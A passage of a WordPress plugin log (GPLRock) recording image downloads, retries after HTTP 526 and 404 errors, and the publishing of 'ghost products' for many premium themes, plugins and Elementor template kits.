526, Error: . Retrying... [05-Apr-2026 11:03:54 UTC] GPLRock: Image download failed for product carrby-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:03:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/carrby---agency-portfolio-wordpress-theme-14598.webp for product carrby-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:03:56 UTC] GPLRock WARNING: Image download failed for product carrby-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/carrby---agency-portfolio-wordpress-theme-14598.webp [05-Apr-2026 11:03:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: carrby-agency-portfolio-wordpress-theme [05-Apr-2026 11:03:56 UTC] GPLRock: Image downloaded successfully for product makehub-beauty-cosmetics-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1839806b.webp [05-Apr-2026 11:03:56 UTC] GPLRock: Using pre-downloaded image for product makehub-beauty-cosmetics-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1839806b.webp [05-Apr-2026 11:03:56 UTC] GPLRock: Ghost product published with image - Product ID: makehub-beauty-cosmetics-woocommerce-theme [05-Apr-2026 11:04:31 UTC] GPLRock: Image downloaded successfully for product wpmu-dev-ultimate-branding (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4c26b027.jpg [05-Apr-2026 11:04:31 UTC] GPLRock: Using pre-downloaded image for product wpmu-dev-ultimate-branding: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4c26b027.jpg [05-Apr-2026 11:04:31 UTC] GPLRock: Ghost product published with image - Product ID: wpmu-dev-ultimate-branding [05-Apr-2026 11:04:33 UTC] GPLRock: Image downloaded successfully for product thrive-clever-widgets (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-163eee8c.jpg [05-Apr-2026 11:04:33 UTC] GPLRock: Using pre-downloaded image for product thrive-clever-widgets: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-163eee8c.jpg [05-Apr-2026 11:04:33 UTC] GPLRock: Ghost product published with image - Product ID: thrive-clever-widgets [05-Apr-2026 11:04:34 UTC] GPLRock: Image downloaded successfully for product gravity-forms-webhooks-add-on (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4dde964a.jpg [05-Apr-2026 11:04:35 UTC] GPLRock: Using pre-downloaded image for product gravity-forms-webhooks-add-on: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4dde964a.jpg [05-Apr-2026 11:04:35 UTC] GPLRock: Ghost product published with image - Product ID: gravity-forms-webhooks-add-on [05-Apr-2026 11:04:36 UTC] GPLRock: Image downloaded successfully for product thrive-themes-focusblog-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-56eae238.jpg [05-Apr-2026 11:04:36 UTC] GPLRock: Using pre-downloaded image for product thrive-themes-focusblog-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-56eae238.jpg [05-Apr-2026 11:04:36 UTC] GPLRock: Ghost product published with image - Product ID: thrive-themes-focusblog-wordpress-theme [05-Apr-2026 11:04:38 UTC] GPLRock: Image downloaded successfully for product themify-post-type-builder-submissions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a0264cea.jpg [05-Apr-2026 11:04:38 UTC] GPLRock: Using pre-downloaded image for product themify-post-type-builder-submissions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a0264cea.jpg [05-Apr-2026 11:04:38 UTC] GPLRock: Ghost product published with image - Product ID: themify-post-type-builder-submissions [05-Apr-2026 11:04:40 UTC] GPLRock: Image downloaded successfully for product themify-post-type-builder-extra-fields (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b1ace15.jpg [05-Apr-2026 11:04:40 UTC] GPLRock: Using pre-downloaded image for product themify-post-type-builder-extra-fields: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-7b1ace15.jpg [05-Apr-2026 11:04:40 UTC] GPLRock: Ghost product published with image - Product ID: themify-post-type-builder-extra-fields [05-Apr-2026 11:04:42 UTC] GPLRock: Image downloaded successfully for product briefcase-elementor-widgets (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0eef9e49.jpg [05-Apr-2026 11:04:42 UTC] GPLRock: Using pre-downloaded image for product briefcase-elementor-widgets: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0eef9e49.jpg [05-Apr-2026 11:04:42 UTC] GPLRock: Ghost product published with image - Product ID: briefcase-elementor-widgets [05-Apr-2026 11:04:43 UTC] GPLRock: Image downloaded successfully for product ultimate-member-bbpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-689d3815.jpg [05-Apr-2026 11:04:44 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-bbpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-689d3815.jpg [05-Apr-2026 11:04:44 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-bbpress [05-Apr-2026 11:04:45 UTC] GPLRock: Image downloaded successfully for product ultimate-member-followers-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10dfe103.jpg [05-Apr-2026 11:04:45 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-followers-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-10dfe103.jpg [05-Apr-2026 11:04:45 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-followers-addon [05-Apr-2026 11:04:46 UTC] GPLRock: Image downloaded successfully for product ultimate-member-friends-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c72429c.jpg [05-Apr-2026 11:04:47 UTC] GPLRock: Using pre-downloaded image for product ultimate-member-friends-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4c72429c.jpg [05-Apr-2026 11:04:47 UTC] GPLRock: Ghost product published with image - Product ID: ultimate-member-friends-addon [05-Apr-2026 11:06:15 UTC] GPLRock: Image downloaded successfully for product order-notifications-on-whatsapp-for-woocommerce (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3be98058.jpg [05-Apr-2026 11:06:15 UTC] GPLRock: Using pre-downloaded image for product order-notifications-on-whatsapp-for-woocommerce: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-3be98058.jpg [05-Apr-2026 11:06:15 UTC] GPLRock: Ghost product published with image - Product ID: order-notifications-on-whatsapp-for-woocommerce [05-Apr-2026 11:06:16 UTC] GPLRock: Image downloaded successfully for product custom-start-date-for-woocommerce-subscriptions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a1fcda31.jpg [05-Apr-2026 11:06:16 UTC] GPLRock: Using pre-downloaded image for product custom-start-date-for-woocommerce-subscriptions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a1fcda31.jpg [05-Apr-2026 11:06:16 UTC] GPLRock: Ghost product published with image - Product ID: custom-start-date-for-woocommerce-subscriptions [05-Apr-2026 11:06:18 UTC] GPLRock: Image downloaded successfully for product triump-life-coach-motivator-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6d9eb51.jpg [05-Apr-2026 11:06:18 UTC] GPLRock: Using pre-downloaded image for product triump-life-coach-motivator-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a6d9eb51.jpg [05-Apr-2026 11:06:18 UTC] GPLRock: Ghost product published with image - Product ID: triump-life-coach-motivator-elementor-template-kit [05-Apr-2026 11:06:20 UTC] GPLRock: Image downloaded successfully for product motivakit-life-coach-motivator-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80eec57a.jpg [05-Apr-2026 11:06:20 UTC] GPLRock: Using pre-downloaded image for product motivakit-life-coach-motivator-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-80eec57a.jpg [05-Apr-2026 11:06:20 UTC] GPLRock: Ghost product published with image - Product ID: motivakit-life-coach-motivator-elementor-template-kit [05-Apr-2026 11:06:22 UTC] GPLRock: Image downloaded successfully for product packpals-packaging-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fb9acea4.jpg [05-Apr-2026 11:06:22 UTC] GPLRock: Using pre-downloaded image for product packpals-packaging-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fb9acea4.jpg [05-Apr-2026 11:06:22 UTC] GPLRock: Ghost product published with image - Product ID: packpals-packaging-company-elementor-template-kit [05-Apr-2026 11:06:23 UTC] GPLRock: Image downloaded successfully for product everest-forms-post-submissions (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4aa475be.jpg [05-Apr-2026 11:06:23 UTC] GPLRock: Using pre-downloaded image for product everest-forms-post-submissions: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4aa475be.jpg [05-Apr-2026 11:06:23 UTC] GPLRock: Ghost product published with image - Product ID: everest-forms-post-submissions [05-Apr-2026 11:06:26 UTC] GPLRock: Image downloaded successfully for product everest-forms-stripe (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1d925afb.jpg [05-Apr-2026 11:06:26 UTC] GPLRock: Using pre-downloaded image for product everest-forms-stripe: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1d925afb.jpg [05-Apr-2026 11:06:26 UTC] GPLRock: Ghost product published with image - Product ID: everest-forms-stripe [05-Apr-2026 11:06:27 UTC] GPLRock: Image downloaded successfully for product everest-forms-survey-polls-and-quiz (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d7be0aeb.jpg [05-Apr-2026 11:06:27 UTC] GPLRock: Using pre-downloaded image for product everest-forms-survey-polls-and-quiz: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d7be0aeb.jpg [05-Apr-2026 11:06:27 UTC] GPLRock: Ghost product published with image - Product ID: everest-forms-survey-polls-and-quiz [05-Apr-2026 11:06:29 UTC] GPLRock: Image downloaded successfully for product everest-forms-multi-part (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5416cdc6.jpg [05-Apr-2026 11:06:29 UTC] GPLRock: Using pre-downloaded image for product everest-forms-multi-part: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5416cdc6.jpg [05-Apr-2026 11:06:29 UTC] GPLRock: Ghost product published with image - Product ID: everest-forms-multi-part [05-Apr-2026 11:16:25 UTC] GPLRock: Image downloaded successfully for product grochy-organic-food-grocery-store-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e89fb6fa.jpg [05-Apr-2026 11:16:25 UTC] GPLRock: Using pre-downloaded image for product grochy-organic-food-grocery-store-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e89fb6fa.jpg [05-Apr-2026 11:16:25 UTC] GPLRock: Ghost product published with image - Product ID: grochy-organic-food-grocery-store-elementor-template-kit [05-Apr-2026 11:16:26 UTC] GPLRock: Image downloaded successfully for product griyo-real-estate-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5248a1d0.webp [05-Apr-2026 11:16:26 UTC] GPLRock: Using pre-downloaded image for product griyo-real-estate-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5248a1d0.webp [05-Apr-2026 11:16:26 UTC] GPLRock: Ghost product published with image - Product ID: griyo-real-estate-elementor-template-kit [05-Apr-2026 11:16:28 UTC] GPLRock: Image downloaded successfully for product greeny-interior-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-def8a1d3.webp [05-Apr-2026 11:16:28 UTC] GPLRock: Using pre-downloaded image for product greeny-interior-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-def8a1d3.webp [05-Apr-2026 11:16:28 UTC] GPLRock: Ghost product published with image - Product ID: greeny-interior-elementor-template-kit [05-Apr-2026 11:16:30 UTC] GPLRock: Image downloaded successfully for product greentech-green-technology-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2ea7417f.webp [05-Apr-2026 11:16:30 UTC] GPLRock: Using pre-downloaded image for product greentech-green-technology-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2ea7417f.webp [05-Apr-2026 11:16:30 UTC] GPLRock: Ghost product published with image - Product ID: greentech-green-technology-services-elementor-template-kit [05-Apr-2026 11:16:31 UTC] GPLRock: Image downloaded successfully for product greenside-golf-club-academy-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f51ca399.webp [05-Apr-2026 11:16:31 UTC] GPLRock: Using pre-downloaded image for product greenside-golf-club-academy-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f51ca399.webp [05-Apr-2026 11:16:31 UTC] GPLRock: Ghost product published with image - Product ID: greenside-golf-club-academy-elementor-template-kit [05-Apr-2026 11:16:33 UTC] GPLRock: Image downloaded successfully for product greenia-landscape-gardening-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d5edab41.webp [05-Apr-2026 11:16:33 UTC] GPLRock: Using pre-downloaded image for product greenia-landscape-gardening-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d5edab41.webp [05-Apr-2026 11:16:33 UTC] GPLRock: Ghost product published with image - Product ID: greenia-landscape-gardening-elementor-template-kit [05-Apr-2026 11:16:34 UTC] GPLRock: Image downloaded successfully for product greenco-landscaping-gardening-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3dfbf230.jpg [05-Apr-2026 11:16:34 UTC] GPLRock: Using pre-downloaded image for product greenco-landscaping-gardening-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3dfbf230.jpg [05-Apr-2026 11:16:34 UTC] GPLRock: Ghost product published with image - Product ID: greenco-landscaping-gardening-elementor-template-kit [05-Apr-2026 11:16:36 UTC] GPLRock: Image downloaded successfully for product gravitas-garden-landscape-design-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bcf85239.webp [05-Apr-2026 11:16:36 UTC] GPLRock: Using pre-downloaded image for product gravitas-garden-landscape-design-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bcf85239.webp [05-Apr-2026 11:16:36 UTC] GPLRock: Ghost product published with image - Product ID: gravitas-garden-landscape-design-elementor-template-kit [05-Apr-2026 11:16:37 UTC] GPLRock: Image downloaded successfully for product grasp-creative-portfolio-agency-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e062d9a.webp [05-Apr-2026 11:16:37 UTC] GPLRock: Using pre-downloaded image for product grasp-creative-portfolio-agency-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e062d9a.webp [05-Apr-2026 11:16:37 UTC] GPLRock: Ghost product published with image - Product ID: grasp-creative-portfolio-agency-elementor-template-kit [05-Apr-2026 11:16:39 UTC] GPLRock: Image downloaded successfully for product granite-construction-building-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4b78003c.webp [05-Apr-2026 11:16:39 UTC] GPLRock: Using pre-downloaded image for product granite-construction-building-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4b78003c.webp [05-Apr-2026 11:16:39 UTC] GPLRock: Ghost product published with image - Product ID: granite-construction-building-company-elementor-template-kit [05-Apr-2026 11:17:41 UTC] GPLRock: Image download failed for product woocommerce-smart-coupons (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 11:17:45 UTC] GPLRock: Image download failed for product woocommerce-smart-coupons (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 11:17:49 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/03/WooCommerce-Smart-Coupons.jpg for product woocommerce-smart-coupons after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 11:17:51 UTC] GPLRock: Image download failed for product woocommerce-smart-coupons (attempt 1/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 11:17:55 UTC] GPLRock: Image download failed for product woocommerce-smart-coupons (attempt 2/3). HTTP Code: 404, Error: . Retrying... [05-Apr-2026 11:17:59 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/03/WooCommerce-Smart-Coupons.jpg for product woocommerce-smart-coupons after 3 attempts. HTTP Code: 404, Error: [05-Apr-2026 11:17:59 UTC] GPLRock WARNING: Image download failed for product woocommerce-smart-coupons. URL: https://www.gplrock.com/wp-content/uploads/2020/03/WooCommerce-Smart-Coupons.jpg [05-Apr-2026 11:17:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-smart-coupons [05-Apr-2026 11:18:01 UTC] GPLRock: Image downloaded successfully for product jetsmartfilters-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f558a3ce.jpg [05-Apr-2026 11:18:01 UTC] GPLRock: Using pre-downloaded image for product jetsmartfilters-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f558a3ce.jpg [05-Apr-2026 11:18:01 UTC] GPLRock: Ghost product published with image - Product ID: jetsmartfilters-for-elementor [05-Apr-2026 11:18:03 UTC] GPLRock: Image downloaded successfully for product ajax-search-pro-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b0649531.jpg [05-Apr-2026 11:18:03 UTC] GPLRock: Using pre-downloaded image for product ajax-search-pro-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b0649531.jpg [05-Apr-2026 11:18:03 UTC] GPLRock: Ghost product published with image - Product ID: ajax-search-pro-plugin [05-Apr-2026 11:18:04 UTC] GPLRock: Image downloaded successfully for product the-plus-addon-for-elementor-page-builder-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ce8fe54.jpg [05-Apr-2026 11:18:04 UTC] GPLRock: Using pre-downloaded image for product the-plus-addon-for-elementor-page-builder-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-6ce8fe54.jpg [05-Apr-2026 11:18:04 UTC] GPLRock: Ghost product published with image - Product ID: the-plus-addon-for-elementor-page-builder-wordpress-plugin [05-Apr-2026 11:18:06 UTC] GPLRock: Image downloaded successfully for product thegem-creative-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-49c1ccd6.jpg [05-Apr-2026 11:18:06 UTC] GPLRock: Using pre-downloaded image for product thegem-creative-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-49c1ccd6.jpg [05-Apr-2026 11:18:06 UTC] GPLRock: Ghost product published with image - Product ID: thegem-creative-wordpress-theme [05-Apr-2026 11:18:08 UTC] GPLRock: Image downloaded successfully for product wplms-learning-management-system-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4cbab7e.jpg [05-Apr-2026 11:18:08 UTC] GPLRock: Using pre-downloaded image for product wplms-learning-management-system-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e4cbab7e.jpg [05-Apr-2026 11:18:08 UTC] GPLRock: Ghost product published with image - Product ID: wplms-learning-management-system-for-wordpress [05-Apr-2026 11:18:09 UTC] GPLRock: Image downloaded successfully for product soflyy-wp-all-import-pro-woocommerce-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f6d17951.jpg [05-Apr-2026 11:18:09 UTC] GPLRock: Using pre-downloaded image for product soflyy-wp-all-import-pro-woocommerce-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f6d17951.jpg [05-Apr-2026 11:18:09 UTC] GPLRock: Ghost product published with image - Product ID: soflyy-wp-all-import-pro-woocommerce-addon [05-Apr-2026 11:18:10 UTC] GPLRock: Image downloaded successfully for product wp-schema-pro-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-31525017.jpg [05-Apr-2026 11:18:10 UTC] GPLRock: Using pre-downloaded image for product wp-schema-pro-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-31525017.jpg [05-Apr-2026 11:18:10 UTC] GPLRock: Ghost product published with image - Product ID: wp-schema-pro-plugin [05-Apr-2026 11:18:12 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-catalog-mode-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9a1f3893.jpg [05-Apr-2026 11:18:12 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-catalog-mode-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9a1f3893.jpg [05-Apr-2026 11:18:12 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-catalog-mode-premium [05-Apr-2026 11:18:13 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-customize-my-account-page-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0f76af24.jpg [05-Apr-2026 11:18:13 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-customize-my-account-page-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0f76af24.jpg [05-Apr-2026 11:18:13 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-customize-my-account-page-premium [05-Apr-2026 11:20:02 UTC] GPLRock: Image download failed for product css3-form-pack (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:20:04 UTC] GPLRock: Image download failed for product css3-form-pack (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:20:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/css3-form-pack-17290.webp for product css3-form-pack after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:20:06 UTC] GPLRock: Image download failed for product css3-form-pack (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:20:08 UTC] GPLRock: Image download failed for product css3-form-pack (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:20:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/css3-form-pack-17290.webp for product css3-form-pack after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:20:10 UTC] GPLRock WARNING: Image download failed for product css3-form-pack. URL: https://meldwp.com/wp-content/uploads/css3-form-pack-17290.webp [05-Apr-2026 11:20:10 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: css3-form-pack [05-Apr-2026 11:20:10 UTC] GPLRock: Image download failed for product binance-pay-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:20:12 UTC] GPLRock: Image download failed for product binance-pay-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:20:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/binance-pay-payment-gateway-for-woocommerce-2018.webp for product binance-pay-payment-gateway-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:20:15 UTC] GPLRock: Image download failed for product binance-pay-payment-gateway-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:20:17 UTC] GPLRock: Image download failed for product binance-pay-payment-gateway-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:07 UTC] GPLRock: Image download failed for product onestudio-a-unique-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:09 UTC] GPLRock: Image download failed for product onestudio-a-unique-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onestudio---a-unique-responsive-wordpress-theme-32529.webp for product onestudio-a-unique-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:11 UTC] GPLRock: Image download failed for product onestudio-a-unique-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:14 UTC] GPLRock: Image download failed for product onestudio-a-unique-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/onestudio---a-unique-responsive-wordpress-theme-32529.webp for product onestudio-a-unique-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:16 UTC] GPLRock WARNING: Image download failed for product onestudio-a-unique-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/onestudio---a-unique-responsive-wordpress-theme-32529.webp [05-Apr-2026 11:30:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: onestudio-a-unique-responsive-wordpress-theme [05-Apr-2026 11:30:16 UTC] GPLRock: Image download failed for product foodizo-fast-food-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:18 UTC] GPLRock: Image download failed for product foodizo-fast-food-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodizo---fast-food-restaurant-wordpress-theme-5326.webp for product foodizo-fast-food-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:20 UTC] GPLRock: Image download failed for product foodizo-fast-food-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:22 UTC] GPLRock: Image download failed for product foodizo-fast-food-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/foodizo---fast-food-restaurant-wordpress-theme-5326.webp for product foodizo-fast-food-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:24 UTC] GPLRock WARNING: Image download failed for product foodizo-fast-food-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/foodizo---fast-food-restaurant-wordpress-theme-5326.webp [05-Apr-2026 11:30:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: foodizo-fast-food-restaurant-wordpress-theme [05-Apr-2026 11:30:25 UTC] GPLRock: Image download failed for product tuning-car-detailing-dealer-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:27 UTC] GPLRock: Image download failed for product tuning-car-detailing-dealer-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 11:30:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tuning---car-detailing--dealer-shop-wordpress-theme-29680.webp for product tuning-car-detailing-dealer-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 11:30:29 UTC] GPLRock: Image download failed for product 